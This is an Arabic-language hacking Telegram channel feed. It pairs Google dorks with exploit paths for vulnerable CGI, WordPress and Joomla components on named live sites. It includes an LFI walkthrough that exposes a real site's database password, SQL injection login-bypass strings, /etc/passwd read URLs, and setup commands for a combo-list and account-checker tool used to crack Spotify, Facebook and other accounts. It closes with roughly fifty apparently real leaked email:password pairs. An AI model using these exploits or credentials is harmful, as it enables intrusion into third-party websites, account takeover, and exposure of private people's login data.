Termux CS
4.27K subscribers
1.52K photos
66 videos
273 files
3.72K links
بوت القناة

t.me/TermuxCS_Bot
Download Telegram
اسوورد وهي مشفرة كالسابق على مقياس DES 
فك تشفيرها وانتهينا

ألحين راح نلاحظ الثغرة على هذه الصفحة
http://www.modammer.com/cgi-bin/webBBS/profiles/

-------------------------------

WebAdverts Script بواسطة Darryl C. Burgdorf

كالسابق تقريبا لكن يسمح لصاحب الموقع لإضافة وتعديل Banners الخاص بالموقع 
وهذا السكربت يحتوي على نقطة ضعف تعرض معلومات حساسة 

المحل الرئيسي للباسوورد الموجود في Webadverts هو:

http://www.modammer.com/cgi-bin/advert/adpassword.txt 

بعد فك تشفير الباسوورد نذهب إلى هذه الصفحة :

http://www.modammer.com/cgi-bin/advert/ads_admin.pl

-------------------------------

WWWBoard Script 
هو أيضا من أنواع المنتديات وتستخدم في الاعلانات 
هالمرة ملف الباسوورد راح يكون صريح معاك وملفه يحمل اسم password.txt
اذا تريد مزيد من الثغرات فقط اذهب ابحث عن 
cgi-bin/wwwebboard أو webboard/password.txt 

-------------------------------

Mailmachine Script
Mailmachine.cgi عبارة عن سكربت ليقوم بعمل MailingList 
عليك برؤية ملف addresses.txt 
حيث يحتوي على عناوين إيميلات الذين قاموا بالاشتراك 
كثير من CGI-Maillists تحتوي على هذه الأخطاء 
مكان وجود الثغرة:
http://www.modammer.com/cgi-bin/mailman/addresses.txt
http://www.modammer.com/cgi-bin/maillist/addresses.txt 
http://www.modammer.com/cgi-bin/mail/addresses.txt 

وأيضا يجب عليك أن تبحث عن addresses.txt لكن احيانا ملفات العناوين تختلف لذلك عليك بالذهاب إلى

http://www.modammer.com/cgi-bin/maillist/subscribe.htm

***************************
هناك سكربتات كثيرة يمكنك استغلالها بنفسك وأيضا هذا النوع من الثغرات 
سهل انك تبحث عن ثغرة خلاله وتستغلها ...
***************************

1.7 كيف لي أن أجد موقع مصاب بثغرة ؟
++++++++++++++++++++++++
قبل مانشرح بكم كيف تبحث عن موقع مصاب اخواني انتم لاتتعلمون لأجل أن تخربون بل بالعكس لكي تزيدون من معرفتكم وهذا مايحمسني لقراءة المزيد من المواضيع ...
ومو أي موقع يحتوي على CGI-Scripts تخترقونه !!!
هذا ليس علم ولانفع 
وحاول تتعلم لغة Perl اللغة التي تمتم بها كتابة أكثر من CGI-Scripts بواسطتها
لذلك حاولوا ان تبحثوا عن الاجوبة والحلول قبل ان تبحثوا عن طرق الاخترق

الحين نقولكم كيف تبحثون عن موقع مصاب بهذا النوع من السكربتات اقولكم كثير ومن السهل فعل ذلك فقط استخدم محركات بحث متطورة وكبيرة مثل:
http://www.google.com
http://www.altavista.com
هذي المحركات سوف تبحث لك عن اي مطابق لكلمة 
cgi-bin أو cgi-bin/calendar.cfg أو cgi-bin/password.tx etc. etc
لذلك عليك بكتابة
cgi-bin/

وفيه برنامج جميل احب اطلعكم عليه وهو 
Intellitamper 
يسمح لك بمعرفة الملفات على السيرفر 
(راح يساعدك كثير)
الموقع:www.intellitamper.com


1.8 الحلول الممكنة Solutions 
++++++++++++++++++++++++
هناك المزيد من الحلول لكن الحل الأمثل والأساسي هو عمل Lock على مجلدات CGI-BIN/

حل آخر وهو زيارة مواقع BugTraq والتي تحتوي على تفاصيل اخر الثغرات فقط استخدم محرك البحث الذي تحتويه هذه المواقع وسوف تجد حلول لثغرات CGI 
المواقع/
http://www.securityfocus.com
http://www.securiteam.com
 

 #cs
الدورك

inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html



مثال موقع

http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php



#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html

مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html

============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html

===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html

============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php

============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif

#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
 ثغرة Local File Include

بسم الله الرحمن الرحيم
اخواني الكرام 
السلام عليكم و رحمة الله وبركاته 
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=index  


طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!! 
والمراد من فك التشفير هو الحصول على ملف الكونيفق 
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود

كود PHP: [عرض]

php://filter/convert.base64-encode/resource=config_inc  

الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة 
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom


#CS
السلام عليكم ورحمة الله وبركاته

 اليوم راح اعلمكم 6 أنواع من التشفير و كيفيه فكها

1-  التشفير الأول يسمي ASCII

- تشفير أسكي ASCII وهي إختصار لـ (American Standard Code for Information Interchange )
هي مجموعة رموز ونظام ترميز مبني على الابجدية اللاتينية بالشكل الذي تستخدم به في الإنجليزية الحديثة ولغات غرب أوروبية أخرى. من أكثر الاستخدامات شيوعا للنصوص المكتوبة بالآسكي ,استخدامها في أنظمةالحاسوب، وفي أجهزة الاتصالات وأنظمة التحكم التي تتعامل مع نصوص.
يعرّف نظام ASCII القياسي الرموز القابلة للطباعة الآتية ، مرتبة حسب قيمة ASCII الخاصة بها

 ويمكن استخدام تطبيق ASCII CONVERTER


2- التشفير الثاني  يسمي  BIN



3-   التشفير الثالث  يسمي HEX


ويمكن استخدام تطبيق ASCII CONVERTER


4-   التشفير الرابع  يسمي OCT

نفس الشي يستخدم تطبيق ويمكن استخدام تطبيق ASCII CONVERTER


ويمكن استخدام تطبيق ASCII CONVERTER


5-   التشفير الخامس يسمي based64

الأساس 64 طريقة ترميز لتحويل ترميز أسكي للحروف إلى ترميز على أساس 64 ثم استخدام الحرف المقابل له في ترميز 64 [انظر جدول 1 في الأسفل ]
يستخدم الترميز بالأساس 64 عندما تكون هناك حاجةلترميز البيانات الثنائية المنقولة والممثلة لبيانات نصية، من أجل التأكد أن البيانات لا تزال سليمة بعد عملية النقل.
هناك العديد من التطبيقات التي تستخدم الترميز بالأساس 64 مثل البريد الإلكتروني باستخدام معيار الإنترنتMIME وكذلك في تخزين البيانات المعقدة في الإكس إم إل
يتم استخدام هذا الرابط لتشفير و فك التشفير

 
 http://www.convertstring.com/ar/EncodeDecode/Base64Decode

أو استخدام تطبيق  ASCII CONVERTER


6-   التشفير السادس  يسمي MD5


خوارزمية أم دي 5 أو خوارزمية هضم الرسالة الخامسة(بالإنجليزية: Message Digest MD5 algorithm) هي دالة الاختزال المسمّاة دالة هاش تشفيرية (Message Digest) والتي تُعتبر من أكثر دوال الاختزال انتشارًا في علم التشفير وأمن المعلومات نظرًا لسهولة تنفيذها وصعوبة اختراقها. يشمل ذلك نظرة سريعة على أهميّتها، طريقة تطويرها من النظريّة التي تتّبعها ومُخرجاتها، والنسخ السابقة لها إم دي2, إم دي4 المطوّرة في مختبرات إم آي تي MIT عن طريق الدكتور رونالد ريفست. يُفرّق أيضًا بين MD5 وبقيّة دوال الاختزال عن طريق أبرز خصائصها التقنيّة ومميّزاتها، ثُم يوضّح بشيءٍ من التفصيل خطوات تنفيذها بدءًا من طريقة الاختزال، مرورًا بالجولات الأربع انتهاءً باختزال الرسالة الأصليّة إلى شكلها النهائيّ. وأخيرًا يُلقي هذا المقال نظرة سريعة على عيوب ونقاط ضعف هذه الدالّة نسبةً إلى ثباتها أمام محاولات الاختراق، وسلسلة محاولات الكسر الناجحة التي حصلت عليها مُنذ بداية تطويرها.

  و الموقع المستخدم لتشفير و فك تشفيرها هو

http://ar.freemd5.com/








#CS
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:

# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png

# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png

# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png

# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png

#################################################
# Telegram: @ArkealoGeNDz
#################################################
السلام عليكم ورحمة الله وبركاته

صار لي فترة مانشرت شي

شرح بسيط و حلو


في أشخاص فضوليه مثلي إذا حد ارسل لها رابط تفتحه علي طول لمعرفه ما بداخل هذا الرابط
جلبت لكم طريقه رائعه لمعرفه مابداخل الرابط من غير ما تفتح الرابط اصلا و هي عن طريق بوت @URL2IMGBot
وظيفه هذا البوت تصوير ما بداخل هذا الرابط


كل ما عليك الضغط علي start
و بعدها تعطيه اي رابط بدك تعرف ما بداخله راح يعطيك صورة فيها استكشاف للرابط


مثلا انا راح انسخ هذا الرابط و اضعه بالبوت

https://www.cobaltstrike.com

راح استني شوي راح يعطيني صورة بها الموقع




#CS
Forwarded from URL2IMGBot
Not readable? Request the screenshot as file.
ثغرة wptf-image-gallery 1.0.3 - Remote File  Download

الاستغلال


./wptf-image-gallery/lib-mbox/ajax_load.php


شرح

http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd


#CS
الثغرة
 Local File Disclosure in wordpress theme Diarise


الدورك
 inurl:"wp-content/themes/diarise/"

الاستغلال

http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

#CS
الدورك    intext:"ISPROJEK"


بعدها العثور علي لوحه التحكم


راح يكون اليوزر و الباس تبعهم


user: ' or 1=1 limit 1 -- -+

 password: ' or 1=1 limit 1 -- -+


الثاني



الدورك

filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php






الدورك
inurl:"index.php?mnu=login"


الاستخدام

/ index.php?mnu=admin


الدورك

intext:"Powered by iyiWebSitesi"


الاستخدام

لوحه التحكم


testpage.com/admin
sql bypass
 id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#


#cs
 ثغرة   PHPMiniAdmin 1.9 Database Open No-Secure Exploit


الدورك   

inurl:phpminiadmin.php


الاستغلال


https://site.com/salon/db/phpminiadmin.php



#CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure


الدورك 
inurl:''/index.php?option=com_rsfirewall''


أو


 inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net


أو

intext:Designed by Artilabio



الاستغلال


ممكن نسحب اللسته تبع الباسورد

/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt


أو الوصول لقاعدة  البيانات

/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql

 /administrator/components/com_rsfirewall/sql/mysql/configuration.sql


/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql


/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql


 /administrator/components/com_rsfirewall/

وغيرها من القواعد


مثال


www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt



#CS
السلام عليكم ورحمة الله وبركاته

شرقي اليوم كيفيه  تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
  سهل جداا
سنتحتاج الي اداتين هما 
الاتشكر والكومبو البريفيت
 
اولا قم بفتح termux  

اولا علينا تثبيت أداة الكومبو وظيفتها  استخراج  كومبو من التيرمكس

اوامرها
 

pkg install php git -y



git clone https://github.com/Juni0r007/PasTerm.git



cd PasTerm

chmod +x *

php pasterm.php

راح تفتح معك الأداة

و بعدها
راح يطلب لك تكتب key word راح تنسخ
 الموجود بالأسفل و تلصقه علي termux

 
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com


و بعدها راح يقول لك اكتب اسم لهذة اللسته
  انا كتبت saja

و بعدها راح يطلع لك مسار التم الاحتفاظ به

مثل هذا

/data/data/com.termux/files/home/saja.txt


كذا انتهينا من الأداة الاولي و تم استخراج للسته
 قويه من والكومبو


راح بندا الجزء الثاني و هو  تثبيت اداة اتشكر الاكونتات

 نفتح صفحه جديدة و نكتب الأوامر التاليه


 
1- rm -rif  PasTerm
apt update&&apt upgrade -y

2-termux-setup-storage

3- pkg install php git -y


4- git clone https://github.com/Juni0r007/AIOChk.git


5- ls


6- cd AIOChk


7- chmod +x *


8- php aio.php



و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد

راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا

/data/data/com.termux/files/home/saja.txt

 و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها

استمتعوووو

(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)


#CS
mitsu1975@msn.com:Subaru1975
ilrante36@gmail.com:pashok007
Ayoub77127@gmail.com:aqwzsx77
NiceEmka@mail.ru:cegth5648
florentpetit58@outlook.fr:florent58
waprol71@gmail.com:123456qwe
rene.kaur8@gmail.com:Kanakonn32
diego_mzmn@hotmail.com:Ikariam98
gooders@live.co.uk:Marine11
felix.lorente.7@gmail.com:mojopicon7
Dustin@ykc.com:Berkman1
kosmaladamian@gmail.com:K1o2s3m4
arseniy8808@gmail.com:Bonna8808
aaboywow@hotmail.com:Michelaar9
jessethemexi3@yahoo.com:Kicker123
samsch2003@hotmail.com:samsch23
singersys@yahoo.com:roxburyys01
kaczorm321@gmail.com:Artemis761
ilkerzeno@hotmail.de:Autobot1
ayoubyahia14@gmail.com:amine2007
taipari2017@gmail.com:motorbike8
dique95@mail.ru:qq080705
loganarch6@yahoo.com:TXdpry37
joseph.weaver2012@gmail.com:Ramen106
leonardosborges1998@hotmail.com:isotopo2
bashoreeric@gmail.com:kosmo08
trillolavin97@gmail.com:trillolavin97
bachnguyen@gmail.com:minolta1995
toniandhamish@hotmail.com:fashion108
bryanmontalvo11@gmail.com:nayeli09
sqeezrage@gmail.com:mathieu19
mikkel@ahls.dk:Mikkel2000
hiroki.job0423@gmail.com:hiroki0423
victorito919@gmail.com:octubre87
eruler39@gmail.com:E-Ruler39
flaviocoutinho.nave@gmail.com:tavares121
johnnywithnoh@gmail.com:N0thing.
ashleykaybeck@yahoo.com:socrazy1
rezplz_@hotmail.com:Kitkatz1
mr.juerling@gmail.com:Happy0ne
gamer1966@att.net:tacos4me
bg1995@web.de:zeroalfaxD1!
CHUVAKA622@gmail.com:Juancjc1
mockagemaster@googlemail.com:Excal1bur001
saroks80@mail.ru:071177ser
joaogoncaloribeiro@live.com.pt:Santana5
weslley.thomas25@gmail.com:w1e2s3l4
2nekitgames@gmail.com:nikita7224
necromaniatico66@gmail.com:Putoski123
renat1470@yandex.ru:qazwsxedc1470
giuseppepolese89@gmail.com:311089peppe
ieronman@gmail.com:Fox1337fox
lerjux@gmail.com:zubilinmike1285




#CS